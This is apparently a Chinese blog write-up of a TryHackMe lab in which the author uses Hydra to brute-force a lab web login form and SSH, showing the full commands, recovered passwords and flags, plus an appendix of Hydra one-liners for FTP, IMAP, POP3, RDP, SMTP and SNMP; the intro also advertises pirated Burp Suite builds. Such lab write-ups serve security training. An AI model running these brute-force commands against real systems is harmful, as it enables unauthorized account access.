[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录

前言

众所周知,hacker常用Burpsuite破解网站登录凭据抓包爆破账号密码,我也发布了2021/2022/2023的burpsuite的账号密码 但是今天介绍的是九头蛇 对于九头蛇呢我的建议学习是非常重要的

因为在本次我们将用到九头蛇进行爆破ssh登录 这个才是重点学习的地方!!

附Burpsuite的2023开盒即用版

实战

介绍一下九头蛇 我们的靶机地址 http://10.10.52.24  (暂不支持对外开放)

部署附加到此任务的计算机,然后导航到 http://10.10.52.24  (此计算机最多可能需要 3 分钟才能启动)

九头蛇命令

我们传递给 Hydra 的选项取决于我们正在攻击的服务(协议)。例如,如果我们想使用用户名user和密码列表 来暴力破解 FTP passlist.txt,我们可以使用以下命令:

hydra -l user -P passlist.txt ftp://10.10.52.24

对于此部署的计算机,以下是在 SSH 和 Web 表单(POST 方法)上使用 Hydra 的命令。

SSH

hydra -l <username> -P <full path to pass> 10.10.52.24 -t 4 ssh

选项描述
-l指定用于登录的 (SSH) 用户名
-P表示密码列表
-t设置要生成的线程数

例如, hydra -l root -P passwords.txt 10.10.52.24 -t 4 ssh将使用以下参数运行:

  • Hydra 将用root作用户名 ssh
  • passwords.txt 它将尝试文件中的密码
  • 将有四个线程并行运行,如下所示 -t 4

我们也可以使用 Hydra 来暴力破解 Web 表单。您必须知道它正在发出哪种类型的请求;通常使用 GET 或 POST 方法。您可以使用浏览器的网络选项卡(在开发人员工具中)查看请求类型或查看源代码。

表格

sudo hydra <username> <wordlist> 10.10.52.24 http-post-form "<path>:<login_credentials>:<invalid_response>"

选项描述
-l(网络表单)登录的用户名
-P要使用的密码列表
http-post-form表单类型为 POST
<path>登录页面 URL,例如login.php
<login_credentials>用于登录的用户名和密码,例如, username=^USER^&password=^PASS^
<invalid_response>登录失败时的部分响应
-V每次尝试的详细输出

下面是一个更具体的 Hydra 命令示例,用于暴力破解 POST 登录表单:

hydra -l <username> -P <wordlist> 10.10.52.24 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

  • 登录页面只有/,即主IP地址。
  • username是输入用户名的表单字段
  • 指定的用户名将替换^USER^
  • password是输入密码的表单字段
  • 提供的密码将被替换^PASS^
  • 最后F=incorrect是登录失败时服务器回复中出现的字符串

您现在应该有足够的信息来实践这一点,并将您的凭据暴力破解到已部署的计算机上!

按道理应该先ping在看端口

但是我们直接访问网站可以看到80端口直接可以访问的

图片[1],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

这里看到是账号密码爆破登录,其实这个没加验证的用burpsuite爆破也挺简单的具体看:

但是这次们将用到九头蛇进行爆破(九头蛇爆破也是非常快的)可比内置的kali burpsuite快

先随便输入一个账号密码看一下返回信息

图片[2],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

看到返回信息:

图片[3],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

拿到返回信息:

Your username or password is incorrect

我对此准备了一个一千多万的字典去破解他

图片[4],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

在kali linux上运行:

解释一下 -l 之后+需要爆破的用户名 -P之后+字典 pass后+账号密码错误后的提示信息表示过滤

hydra -l molly -P changyong.txt 10.10.52.24 http-post-form "/:username=^USER^&password=^PASS^:Your username or password is incorrect

后来发现1千多万直接把靶机跑死了,给爷也是整醉了

后来换成了6000password

得到密码为sunshine

图片[5],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

flag:

THM{2673a7dd116de68e85c48ec0b1f2612e}

图片[6],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

下面进行SSH爆破:

molly即账号 还是跟上面一样一句话就可以爆破

hydra -l molly -P hack.txt 10.10.52.24 -t 4 ssh
图片[7],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

可以看到密码是butterfly

下面连接ssh

ssh molly@10.10.52.24
图片[8],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

连上密码

ls cat flag

得到flag:THM{c8eeb0468febbadea859baeb33b2541b}

图片[9],[Thm红队]靶场之九头蛇破解网站登录凭据以及ssh登录,网络安全爱好者中心-神域博客网

附加:

暴力FTP
=============
⇒ Hydra -l user -P passlist .txt ftp://10.10.10.10

暴力破解 IMAP
==============
⇒ Hydra -L userlist.txt -p defaultpw imap://10.10.10.10/PLAIN

暴力破解 POP3
== ============
⇒ Hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

暴力 RDP
====== =======
⇒ Hydra rdp://10.10.10.10/firstdomainname -l john -p doe

强力 SMTP
==============
Hydra smtp-enum://10.10。 10.10/vrfy -l john -p localhost

暴力破解 SNMP
==============
⇒ Hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ 10.10.10.10 snmp (SNMP v3)
⇒ Hydra -P pass.txt -m 2 10.10.10.10 snmp (SNMP v2)

进一步学习Hydra(九头蛇):

https://github.com/vanhauser-thc/thc-Hydra

https://en.kali.tools/?p=220

------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发
头像
善语结善缘,恶语伤人心
提交
头像

昵称

取消
昵称常用语 夸夸
夸夸
还有吗!没看够!
表情图片

    暂无评论内容